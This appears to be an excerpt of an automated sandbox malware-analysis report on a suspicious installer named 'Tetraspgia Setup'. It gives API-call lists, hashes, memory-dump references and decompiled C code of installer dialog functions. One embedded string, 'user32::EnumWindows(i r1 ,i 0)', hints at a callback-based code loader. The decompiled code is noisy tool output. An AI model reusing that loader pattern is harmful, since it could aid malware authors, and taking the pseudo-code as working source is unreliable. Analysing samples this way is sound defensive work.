Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 004066D6: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FD78,?), ref: 004066FF
Part of subcall function 004066D6: CloseHandle.KERNEL32(?), ref: 0040670C

CloseHandle.KERNEL32(?,?), ref: 00402110

Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,?), ref: 0040651E
Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548

Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
Instruction ID: ffb54da432574bf9da0ba630d69bdc1efbc191342e5e665899b832719b8482a7
Opcode Fuzzy Hash: 0c7e3ddd56b7c252a2e4c02e228c0bd9f634ef8892ef8691c332d823cf5a2231
Instruction Fuzzy Hash: 50F0C8356093519BD310AF61DD8982FB298FF85359B100A3FFA52B51D2C77C4D068AAF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040441E Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 576
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E0040441E(struct HWND__* _a4, signed int _a8, long _a12, signed int _a16) {
				struct HWND__* _v0;
				signed int* _v40;
				void* _v44;
				signed int _v48;
				long _v52;
				void* _v56;
				signed int _v60;
				int _v64;
				struct HWND__* _v68;
				struct HWND__* _v72;
				void* _v76;
				struct HWND__* _v80;
				void* _v84;
				struct HWND__* _v88;
				intOrPtr _v96;
				void* _v100;
				void* _v104;
				struct HWND__* _v108;
				signed int _t158;
				signed int _t159;
				int _t160;
				void* _t167;
				void* _t170;
				long _t175;
				void* _t198;
				void* _t199;
				int _t209;
				intOrPtr _t214;
				signed int _t215;
				signed int _t216;
				void* _t235;
				void* _t238;
				intOrPtr _t245;
				intOrPtr _t253;
				long _t257;
				void* _t263;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				long _t279;
				long _t280;
				int _t282;
				signed int _t283;
				signed int _t285;
				signed int _t288;
				int _t293;
				signed int _t296;
				void* _t301;
				int _t302;
				void* _t303;
				void* _t306;
				signed int _t307;
				long _t311;
				struct HWND__* _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t319;
				signed int _t320;
				struct HWND__* _t321;
				int _t326;
				struct HWND__* _t327;
				intOrPtr* _t329;
				struct HWND__* _t330;
				signed int _t333;
				int _t334;
				int _t336;
				long _t337;
				intOrPtr _t338;
				signed int* _t340;
				struct HWND__* _t342;
				long _t343;
				void* _t344;
				long _t345;
				signed int _t346;
				struct HWND__* _t347;
				int _t348;
				int _t349;
				void* _t350;
				struct HWND__* _t352;
				struct HWND__* _t354;
				struct HWND__** _t355;

				_t355 =  &_v80;
				_t330 = _a4;
				_v68 = GetDlgItem(_t330, 0x3f9);
				_t347 = GetDlgItem(_t330, 0x408);
				_v72 =  *0x435a28;
				_v64 =  *0x435a10;
				_v80 = _t347;
				if(_a8 != 0x110) {
					L24:
					_t282 =  !=  ? _a8 : 0x40f;
					_v60 = 0x40f;
					_t158 =  !=  ? _a12 : 0;
					_a12 = _t158;
					_t333 =  !=  ? _a16 : 1;
					if(0x40f == 0x4e) {
						L26:
						if(_t282 == 0x413) {
							L28:
							_t320 = _t333;
							_t275 = _t158;
							_t348 = _t282;
							if(( *0x435a0c & 0x00000200) == 0 && (_t282 == 0x413 ||  *((intOrPtr*)(_t333 + 8)) == 0xfffffffe)) {
								_t313 = E004056DA(_v80, 0 | _t282 != 0x413);
								_t320 = _t333;
								_a8 = _t313;
								_t275 = _a4;
								_t348 = _v68;
								if(_t313 >= 0) {
									_t314 = _t313 * 0x818;
									_a8 = _t314;
									_t315 =  *(_t314 + _v72 + 8);
									_t320 = _t333;
									if((_t315 & 0x00000010) == 0) {
										if((_t315 & 0x00000040) == 0) {
											_t316 = _t315 ^ 1;
										} else {
											_t316 =  ==  ? (_t315 ^ 0x00000080) & 0xfffffffe : _t315 ^ 0x00000080 | 0x00000001;
										}
										_t278 = _a16;
										 *(_a8 + _v72 + 8) = _t316;
										E00401221(_t278);
										_t275 = _t278 + 1;
										_t320 =  !( *0x435a0c >> 8) & 1;
										_t348 = 0x40f;
									}
								}
							}
							if(_t333 != 0) {
								_t214 =  *((intOrPtr*)(_t333 + 8));
								if(_t214 == 0xfffffe3d) {
									SendMessageW(_v80, 0x419, 0,  *(_t333 + 0x5c));
									_t214 =  *((intOrPtr*)(_t333 + 8));
								}
								if(_t214 == 0xfffffe39) {
									_t296 =  *(_t333 + 0x5c) * 0x818;
									_t312 = _v72;
									_t215 =  *(_t296 + _t312 + 8);
									if( *((intOrPtr*)(_t333 + 0xc)) != 2) {
										_t216 = _t215 & 0xffffffdf;
									} else {
										_t216 = _t215 | 0x00000020;
									}
									 *(_t296 + _t312 + 8) = _t216;
								}
							}
							L45:
							_t159 = _t275;
							_t283 = _t320;
							_a16 = _t159;
							_t334 = _t348;
							_a8 = _t283;
							_push("true");
							_pop(_t306);
							if(_t348 != 0x111) {
								_t320 = _t283;
								_t275 = _t159;
								_t349 = _t334;
								if(_t334 != 0x200) {
									_t160 = _t349;
									if(_t349 != 0x40b) {
										_a8 = _t320;
										_t349 = _t160;
										_v60 = _t275;
										_a16 = _t349;
										if(_t160 != 0x40f) {
											L88:
											if(_t349 == 0x420 && ( *0x435a0c & 0x00000100) != 0) {
												_t336 =  ==  ? _t306 : 0;
												ShowWindow(_v80, _t336);
												ShowWindow(GetDlgItem(_a4, 0x3fe), _t336);
											}
											L91:
											return E0040575B(_t349, _t275, _t320);
										}
										_t337 = 0;
										L63:
										E004012DD(_t337, _t337);
										if(_t275 != 0) {
											_t196 =  ==  ? _t275 : _t275 - 1;
											_push( ==  ? _t275 : _t275 - 1);
											_push("true");
											E004054B6();
										}
										if(_t320 == 0) {
											L71:
											E004012DD(_t337, _t337);
											_t285 =  *0x435a2c;
											_t167 =  *0x42ed6c; // 0x0
											_a4 = _t337;
											_t338 =  *0x435a28;
											_v52 = 0xf030;
											if(_t285 <= 0) {
												L83:
												if( *0x435afe == 0x400) {
													InvalidateRect(_v80, 0, 1);
												}
												if( *((intOrPtr*)( *0x4349e0 + 0x10)) != 0) {
													_t170 = E00405835(5);
													_push(0);
													E00405560(_t285, 0x3ff, 0xfffffffb, _t170);
												}
												_push("true");
												_pop(_t306);
												goto L88;
											}
											_t276 = _a12;
											_t340 = _t338 + 8;
											_t321 = _v80;
											_t350 = _t167;
											do {
												_t175 =  *((intOrPtr*)(_t350 + _t276 * 4));
												_a12 = _t175;
												if(_t175 != 0) {
													_t307 =  *_t340;
													_v52 = _t175;
													_v56 = 8;
													if((_t307 & 0x00000100) != 0) {
														_v56 = 9;
														_v40 =  &(_t340[4]);
														 *_t340 =  *_t340 & 0xfffffeff;
														_a12 = _v52;
													}
													if((_t307 & 0x00000040) == 0) {
														_t288 = (_t307 & 1) + 1;
														if((_t307 & 0x00000010) != 0) {
															_t288 = _t288 + 3;
														}
													} else {
														_t288 = 3;
													}
													_v48 = (_t288 << 0x0000000b | _t307 & 0x00000008) + (_t288 << 0x0000000b | _t307 & 0x00000008) | _t307 & 0x00000020;
													SendMessageW(_t321, 0x1102, (_t307 >> 0x00000005 & 1) + 1, _a12);
													SendMessageW(_t321, 0x113f, 0,  &_v56);
													_t285 =  *0x435a2c;
												}
												_t276 = _t276 + 1;
												_t340 =  &(_t340[0x206]);
											} while (_t276 < _t285);
											_t320 = _a8;
											_t275 = _v60;
											_t349 = _a16;
											goto L83;
										} else {
											_t320 = E004011A0( *0x42ed6c);
											_a4 = _t320;
											E00401290(_t320);
											_t293 = _t337;
											_t311 = _t337;
											if(_t320 <= 0) {
												L70:
												SendMessageW(_v68, 0x14e, _t293, _t337);
												_t349 = 0x420;
												_a16 = 0x420;
												goto L71;
											}
											do {
												_t194 =  ==  ? _t293 : _t293 + 1;
												_t311 = _t311 + 1;
												_t293 =  ==  ? _t293 : _t293 + 1;
											} while (_t311 < _t320);
											_t337 = 0;
											goto L70;
										}
									}
									_t198 =  *0x42ed70; // 0x0
									if(_t198 != 0) {
										ImageList_Destroy(_t198);
									}
									_t199 =  *0x42ed6c; // 0x0
									if(_t199 != 0) {
										GlobalFree(_t199);
									}
									 *0x42ed70 = 0;
									 *0x42ed6c = 0;
									 *0x435ab8 = 0;
									goto L91;
								}
								SendMessageW(_v80, 0x200, 0, 0);
								_t320 = _a8;
								_t275 = _a16;
								goto L91;
							}
							if(_t275 != 0x3f9 || _t275 >> 0x10 != 1) {
								goto L91;
							} else {
								_t342 = _v68;
								_t209 = SendMessageW(_t342, 0x147, 0, 0);
								if(_t209 == 0xffffffff) {
									goto L91;
								}
								_t277 = SendMessageW;
								_t343 = SendMessageW(_t342, "true", _t209, 0);
								if(_t343 == 0xffffffff ||  *((intOrPtr*)(_v64 + 0x94 + _t343 * 4)) == 0) {
									_push("true");
									_pop(_t343);
								}
								E00401290(_t343);
								_t337 = 0;
								SendMessageW(_v0, 0x420, 0, _t343);
								_t275 = _t277 | 0xffffffff;
								_a4 = 0;
								_t349 = 0x40f;
								_v64 = _t275;
								_t320 = 0;
								_a12 = 0x40f;
								goto L63;
							}
						}
						_t320 = _t333;
						_t275 = _t158;
						_t348 = _t282;
						if( *((intOrPtr*)(_t333 + 4)) != 0x408) {
							goto L45;
						}
						goto L28;
					}
					_t320 = 1;
					_t275 = _t158;
					_t348 = 0x40f;
					if(0x40f != 0x413) {
						goto L45;
					}
					goto L26;
				} else {
					_v76 = 0;
					_t326 = 2;
					 *0x435ab8 = _t330;
					 *0x42ed6c = GlobalAlloc("true",  *0x435a2c << 2);
					_t235 = LoadImageW( *0x4349f4, 0x6e, 0, 0, 0, 0);
					 *0x42ed68 =  *0x42ed68 | 0xffffffff;
					_t344 = _t235;
					 *0x42dd64 = SetWindowLongW(_t347, "true", E004058D0);
					_t238 = ImageList_Create("true", "true", 0x21, 6, 0);
					 *0x42ed70 = _t238;
					ImageList_AddMasked(_t238, _t344, 0xff00ff);
					SendMessageW(_t347, 0x1109, _t326,  *0x42ed70);
					if(SendMessageW(_t347, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_t347, 0x111b, "true", 0);
					}
					DeleteObject(_t344);
					_t352 = _v72;
					_t301 = 0;
					_t345 = 0;
					do {
						_t245 =  *((intOrPtr*)(_v68 + 0x94 + _t345 * 4));
						if(_t245 != 0) {
							_push(_t245);
							_push(_t301);
							SendMessageW(_t352, 0x151, SendMessageW(_t352, 0x143, 0, E00405EBA()), _t345);
							_t270 =  ==  ? _t326 : 0;
							_t301 = 0;
							_t326 =  ==  ? _t326 : 0;
						}
						_t345 = _t345 + 1;
					} while (_t345 < 0x21);
					_t279 = _a12;
					_v64 = _t326;
					_push( *((intOrPtr*)(_t279 + 0x30 + _t326 * 4)));
					_push(0x15);
					E0040551A(_v0);
					_push( *((intOrPtr*)(_t279 + 0x34 + _t326 * 4)));
					_push(0x16);
					E0040551A(_v0);
					_t354 = _v108;
					_t302 = 0;
					_t280 = 0;
					_t346 = 0;
					if( *0x435a2c <= 0) {
						L19:
						SetWindowLongW(_t354, "true", GetWindowLongW(_t354, "true") & 0xfffffffb);
						goto L20;
					} else {
						_t329 = _t355[6] + 0x18;
						do {
							if( *_t329 == _t302) {
								L16:
								_t253 = _v96;
								goto L17;
							}
							_push("true");
							_pop(_t319);
							_v76 = _t280;
							_v72 = 0xffff0002;
							_v68 = 0xd;
							_v56 = _t319;
							_t355[0x15] = _t346;
							_v52 = _t329;
							_v60 =  *(_t329 - 0x10) & _t319;
							if(( *(_t329 - 0x10) & 0x00000002) == 0) {
								if(( *(_t329 - 0x10) & 0x00000004) == 0) {
									_t257 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
									_t303 =  *0x42ed6c; // 0x0
									 *(_t303 + _t346 * 4) = _t257;
								} else {
									_t280 = SendMessageW(_t354, 0x110a, 3, _t280);
								}
								_t302 = 0;
								goto L16;
							}
							_v68 = 0x4d;
							_t355[0x14] = 1;
							_t280 = SendMessageW(_t354, 0x1132, _t302,  &_v76);
							_t263 =  *0x42ed6c; // 0x0
							 *(_t263 + _t346 * 4) = _t280;
							_t253 = 1;
							_t302 = 0;
							_v96 = 1;
							L17:
							_t346 = _t346 + 1;
							_t329 = _t329 + 0x818;
						} while (_t346 <  *0x435a2c);
						if(_t253 != 0) {
							L20:
							if(_v80 != 0) {
								_push(_t354);
							} else {
								_t327 = _v88;
								ShowWindow(_t327, 5);
								_push(_t327);
							}
							E00405503();
							goto L24;
						}
						goto L19;
					}
				}
			}

0x0040441e
0x0040442f
0x0040443e
0x0040444a
0x00404451
0x0040445a
0x00404468
0x0040446c
0x00404698
0x004046a4
0x004046af
0x004046b3
0x004046bb
0x004046c3
0x004046ce
0x004046de
0x004046e0
0x004046f5
0x004046ff
0x00404701
0x00404703
0x00404705
0x0040472e
0x00404734
0x00404736
0x0040473a
0x0040473c
0x00404740
0x00404746
0x0040474c
0x00404750
0x00404754
0x00404759
0x0040475e
0x0040477b
0x00404760
0x00404773
0x00404773
0x00404785
0x0040478a
0x0040478e
0x004047a1
0x004047a2
0x004047a4
0x004047a4
0x00404759
0x00404740
0x004047ab
0x004047ad
0x004047b5
0x004047c6
0x004047cc
0x004047cc
0x004047d4
0x004047d6
0x004047e1
0x004047e5
0x004047e9
0x004047f0
0x004047eb
0x004047eb
0x004047eb
0x004047f3
0x004047f3
0x004047d4
0x004047f7
0x004047f7
0x004047f9
0x004047fb
0x004047ff
0x00404801
0x00404805
0x00404807
0x0040480e
0x004048a9
0x004048ab
0x004048b2
0x004048b6
0x004048d4
0x004048dc
0x00404914
0x00404918
0x0040491a
0x0040491e
0x00404927
0x00404ae0
0x00404ae6
0x00404af9
0x00404b01
0x00404b18
0x00404b18
0x00404b1e
0x00404b2d
0x00404b2d
0x0040492d
0x0040492f
0x00404931
0x00404938
0x00404940
0x00404943
0x00404944
0x00404946
0x00404946
0x0040494d
0x004049a3
0x004049a5
0x004049aa
0x004049b0
0x004049b5
0x004049b9
0x004049bf
0x004049c9
0x00404a9f
0x00404aad
0x00404ab8
0x00404ab8
0x00404ac6
0x00404aca
0x00404acf
0x00404ad8
0x00404ad8
0x00404add
0x00404adf
0x00000000
0x00404adf
0x004049cf
0x004049d3
0x004049d6
0x004049da
0x004049dc
0x004049dc
0x004049e0
0x004049e6
0x004049ec
0x004049ee
0x004049f2
0x00404a00
0x00404a05
0x00404a0d
0x00404a11
0x00404a1b
0x00404a1b
0x00404a22
0x00404a30
0x00404a34
0x00404a36
0x00404a36
0x00404a24
0x00404a26
0x00404a26
0x00404a56
0x00404a64
0x00404a78
0x00404a7e
0x00404a7e
0x00404a84
0x00404a85
0x00404a8b
0x00404a93
0x00404a97
0x00404a9b
0x00000000
0x0040494f
0x0040495a
0x0040495d
0x00404961
0x00404966
0x00404968
0x0040496c
0x00404989
0x00404994
0x0040499a
0x0040499f
0x00000000
0x0040499f
0x00404972
0x0040497d
0x00404980
0x00404981
0x00404983
0x00404987
0x00000000
0x00404987
0x0040494d
0x004048de
0x004048e5
0x004048e8
0x004048e8
0x004048ee
0x004048f5
0x004048f8
0x004048f8
0x00404900
0x00404905
0x0040490a
0x00000000
0x0040490a
0x004048c1
0x004048c7
0x004048cb
0x00000000
0x004048cb
0x0040481c
0x00000000
0x00404833
0x00404833
0x00404841
0x0040484a
0x00000000
0x00000000
0x00404850
0x00404862
0x00404867
0x00404876
0x00404878
0x00404878
0x0040487a
0x00404880
0x0040488c
0x0040488e
0x00404891
0x00404895
0x0040489a
0x0040489e
0x004048a0
0x00000000
0x004048a0
0x0040481c
0x004046e9
0x004046eb
0x004046ed
0x004046ef
0x00000000
0x00000000
0x00000000
0x004046ef
0x004046d0
0x004046d2
0x004046d4
0x004046d8
0x00000000
0x00000000
0x00000000
0x00404472
0x00404472
0x0040447d
0x00404484
0x00404490
0x004044a3
0x004044a9
0x004044b0
0x004044c0
0x004044d0
0x004044dd
0x004044e2
0x004044f5
0x00404506
0x00404513
0x00404513
0x00404516
0x0040451c
0x00404520
0x00404522
0x00404524
0x00404528
0x00404531
0x00404533
0x00404534
0x0040454e
0x00404555
0x00404558
0x0040455a
0x0040455a
0x0040455c
0x0040455d
0x00404562
0x0040456a
0x0040456e
0x00404572
0x00404575
0x0040457a
0x0040457e
0x00404581
0x00404586
0x0040458a
0x0040458c
0x0040458e
0x00404596
0x00404665
0x00404675
0x00000000
0x0040459c
0x004045a0
0x004045a3
0x004045a6
0x0040464a
0x0040464a
0x00000000
0x0040464a
0x004045af
0x004045b1
0x004045b4
0x004045bc
0x004045c4
0x004045cc
0x004045d0
0x004045d4
0x004045d8
0x004045dc
0x00404618
0x00404639
0x0040463f
0x00404645
0x0040461a
0x00404629
0x00404629
0x00404648
0x00000000
0x00404648
0x004045e0
0x004045e9
0x004045ff
0x00404601
0x00404606
0x0040460b
0x0040460c
0x0040460e
0x0040464e
0x0040464e
0x0040464f
0x00404655
0x00404663
0x0040467b
0x00404680
0x00404692
0x00404682
0x00404682
0x00404689
0x0040468f
0x0040468f
0x00404693
0x00000000
0x00404693
0x00000000
0x00404663
0x00404596

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404436
GetDlgItem.USER32(?,00000408), ref: 00404442
GlobalAlloc.KERNEL32(?,?), ref: 0040448A
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004044A3
SetWindowLongW.USER32(00000000,?,Function_000058D0), ref: 004044BA
ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 004044D0
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004044E2
SendMessageW.USER32(00000000,00001109,00000002), ref: 004044F5
SendMessageW.USER32(00000000,0000111C,00000000,00000000), ref: 00404501
SendMessageW.USER32(00000000,0000111B,?,00000000), ref: 00404513
DeleteObject.GDI32(00000000), ref: 00404516
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404544
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040454E
SendMessageW.USER32(?,00001132,00000000,?), ref: 004045F9
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404623
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404639
GetWindowLongW.USER32(?,?), ref: 00404668
SetWindowLongW.USER32(?,?,00000000), ref: 00404675
ShowWindow.USER32(?,00000005), ref: 00404689
SendMessageW.USER32(?,00000419,00000000,?), ref: 004047C6
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404841
SendMessageW.USER32(?,?,00000000,00000000), ref: 00404860
SendMessageW.USER32(?,00000420,00000000,?), ref: 0040488C
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004048C1
ImageList_Destroy.COMCTL32(00000000), ref: 004048E8
GlobalFree.KERNEL32(00000000), ref: 004048F8

Strings

M, xrefs: 004045E0

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$ImageWindow$List_Long$GlobalItem$AllocCreateDeleteDestroyFreeLoadMaskedObjectShow
String ID: M
API String ID: 1688767230-3664761504
Opcode ID: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction ID: 0c70e663620b203d4295ddec51a1238c6828a203a6db769dd6a487d059f7c121
Opcode Fuzzy Hash: 593f695f4e0e7a559147944b019e1e190396842a77f5fef561b0bfd50dce2793
Instruction Fuzzy Hash: D812CEB1604301AFD7209F24DC85A6BB7E9EBC8314F104A3EFA95E72E1D7789C018B59

Uniqueness

Uniqueness Score: -1.00%

Function 00404085 Relevance: 33.5, APIs: 11, Strings: 8, Instructions: 281
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00404085(void* __ebx, void* __ebp, struct HWND__* _a4, unsigned int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v4;
				WCHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				signed int _v28;
				struct HWND__* _v32;
				unsigned int _v36;
				signed int _v40;
				long _v48;
				unsigned int _v52;
				signed int _v56;
				long _v64;
				long _v68;
				long _v72;
				unsigned int _v92;
				unsigned int _v96;
				unsigned int _t59;
				unsigned int _t61;
				unsigned int _t63;
				unsigned int _t65;
				unsigned int _t70;
				intOrPtr _t72;
				signed int _t85;
				unsigned int _t86;
				unsigned int _t89;
				signed int _t90;
				unsigned int _t92;
				unsigned int _t95;
				int _t98;
				unsigned int _t103;
				unsigned int _t108;
				unsigned int _t110;
				WCHAR* _t116;
				signed int _t117;
				unsigned int _t118;
				unsigned int _t120;
				short* _t122;
				struct HWND__* _t123;
				struct HWND__* _t124;
				unsigned int _t125;
				void* _t128;
				unsigned int _t134;
				unsigned int _t135;
				WCHAR* _t138;
				unsigned int _t139;
				void* _t140;
				unsigned int _t141;
				unsigned int _t142;
				intOrPtr _t143;
				unsigned int _t147;
				struct HWND__* _t149;
				long* _t150;

				_t150 =  &_v72;
				_t125 =  *0x42dd4c;
				_t135 = _a8;
				_t138 = L"user32::EnumWindows(i r1 ,i 0)" + ( *(_t125 + 0x3c) << 0xb);
				_v52 = _t125;
				if(_t135 != 0x40b) {
					__eflags = _t135 - 0x110;
					if(_t135 != 0x110) {
						__eflags = _t135 - 0x111;
						if(_t135 != 0x111) {
							L19:
							_t59 = _t135;
							__eflags = _t135 - 0x40f;
							if(__eflags == 0) {
								L21:
								_v56 = 0;
								E00406A3A(0x3fb, _t138);
								_t61 = E00406638(__eflags, _t138);
								_t116 = 0x42e568;
								_t147 = 1;
								__eflags = _t61;
								_t127 =  ==  ? 1 : 0;
								_v4 =  ==  ? 1 : 0;
								E00406B1A(0x42e568, _t138);
								_t63 = E004068E6(1);
								_v96 = _t63;
								__eflags = _t63;
								if(_t63 == 0) {
									L28:
									E00406B1A(_t116, _t138);
									_t65 = E00406BC5(_t116);
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *_t65 = 0;
									}
									_t70 = GetDiskFreeSpaceW(_t116,  &_v68,  &_v64,  &_v72,  &_v48);
									__eflags = _t70;
									if(_t70 == 0) {
										_t139 = _v36;
										_t117 = _v40;
										_t147 = _v56;
										goto L35;
									} else {
										_t85 = MulDiv(_v68 * _v64, _v72, 0x400);
										asm("cdq");
										_t117 = _t85;
										_t139 = _t134;
										L33:
										_v40 = _t117;
										_v36 = _t139;
										L35:
										_t128 = E00405835(5);
										__eflags = _t147;
										if(_t147 == 0) {
											L40:
											_t118 = _a8;
											L41:
											_t72 =  *0x4349e0;
											__eflags =  *(_t72 + 0x10);
											if( *(_t72 + 0x10) != 0) {
												_push(0);
												E00405560(_t128, 0x3ff, 0xfffffffb, _t128);
												__eflags = _t147;
												if(_t147 == 0) {
													SetDlgItemTextW(_t150[0x19], 0x400, 0x4095b0);
												} else {
													_push(_v40);
													E00405560(_t128, 0x400, "true", _t150[0xd]);
												}
											}
											 *0x435ae4 = _t118;
											__eflags = _t118;
											if(_t118 == 0) {
												_t118 = E00401533(7);
											}
											_t140 = 0;
											__eflags =  *(_v52 + 0x14) & 0x00000400;
											_t141 =  ==  ? _t118 : _t140;
											__eflags = _t141;
											EnableWindow( *0x42dd54, 0 | _t141 == 0x00000000);
											__eflags = _t141;
											if(_t141 == 0) {
												__eflags =  *0x42dd60 - _t141;
												if( *0x42dd60 == _t141) {
													E0040553C();
												}
											}
											 *0x42dd60 =  *0x42dd60 & 0x00000000;
											__eflags =  *0x42dd60;
											goto L51;
										}
										__eflags = _t139;
										if(__eflags > 0) {
											goto L40;
										}
										if(__eflags < 0) {
											L39:
											_t118 = 2;
											goto L41;
										}
										__eflags = _t117 - _t128;
										if(_t117 >= _t128) {
											goto L40;
										}
										goto L39;
									}
								}
								_t120 = 0;
								__eflags = 0;
								while(1) {
									_t86 =  *_t63(0x42e568,  &_v40,  &_v64,  &_v48);
									__eflags = _t86;
									if(_t86 != 0) {
										break;
									}
									__eflags = _t120;
									if(_t120 != 0) {
										 *_t120 = _t86;
									}
									_t122 = E00406D10(0x42e568);
									_push("true");
									 *_t122 = 0;
									_t120 = _t122 - 2;
									_pop(_t89);
									 *_t120 = _t89;
									_t63 = _v92;
									__eflags = _t120 - 0x42e568;
									if(_t120 != 0x42e568) {
										continue;
									} else {
										_t116 = 0x42e568;
										goto L28;
									}
								}
								_t142 = _v52;
								_t117 = (_t142 << 0x00000020 | _v56) >> 0xa;
								_t139 = _t142 >> 0xa;
								__eflags = _t139;
								goto L33;
							}
							__eflags = _t59 - 0x405;
							if(__eflags != 0) {
								goto L51;
							}
							goto L21;
						}
						_t134 = _a12;
						_t90 = _t134 & 0x0000ffff;
						__eflags = _t90 - 0x3fb;
						if(_t90 != 0x3fb) {
							_t134 = 0x3e9;
							__eflags = _t90 - 0x3e9;
							if(_t90 != 0x3e9) {
								goto L19;
							}
							_t123 = _a4;
							_v28 = 0;
							_v4 = 0;
							_v32 = _t123;
							_v24 = 0x42bd48;
							_v12 = E00404F33;
							_v8 = _t138;
							_v28 = E00405EBA();
							_t92 =  &_v40;
							_v24 = 0x41;
							__imp__SHBrowseForFolderW(_t92, 0x42dd68,  *((intOrPtr*)(_t125 + 0x38)));
							__eflags = _t92;
							if(__eflags == 0) {
								L11:
								_t135 = 0x40f;
								goto L21;
							}
							__imp__CoTaskMemFree(_t92);
							E00406556(_t138);
							_t95 =  *( *0x435a10 + 0x11c);
							__eflags = _t95;
							if(_t95 != 0) {
								__eflags = _t138 - L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
								if(_t138 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring") {
									_push(_t95);
									_push(0);
									E00405EBA();
									_t98 = lstrcmpiW("Call", "Tetraspgia Setup: Installing");
									__eflags = _t98;
									if(_t98 != 0) {
										lstrcatW(_t138, "Call");
									}
								}
							}
							 *0x42dd60 =  *0x42dd60 + 1;
							__eflags =  *0x42dd60;
							SetDlgItemTextW(_t123, 0x3fb, _t138);
							goto L19;
						}
						__eflags = _t134 >> 0x10 - 0x300;
						if(__eflags != 0) {
							goto L19;
						}
						goto L11;
					} else {
						_t124 = _a4;
						_t149 = GetDlgItem(_t124, 0x3fb);
						_t103 = E00406E03(_t138);
						__eflags = _t103;
						if(_t103 != 0) {
							_t110 = E00406BC5(_t138);
							__eflags = _t110;
							if(_t110 == 0) {
								E00406556(_t138);
							}
						}
						 *0x4349dc = _t124;
						SetWindowTextW(_t149, _t138);
						_t143 = _a16;
						_push( *((intOrPtr*)(_t143 + 0x34)));
						_push("true");
						E0040551A(_t124);
						_push( *((intOrPtr*)(_t143 + 0x30)));
						_push("true");
						E0040551A(_t124);
						E00405503(_t149);
						_t108 = E004068E6("true");
						__eflags = _t108;
						if(_t108 != 0) {
							 *_t108(_t149, "true");
						}
						L51:
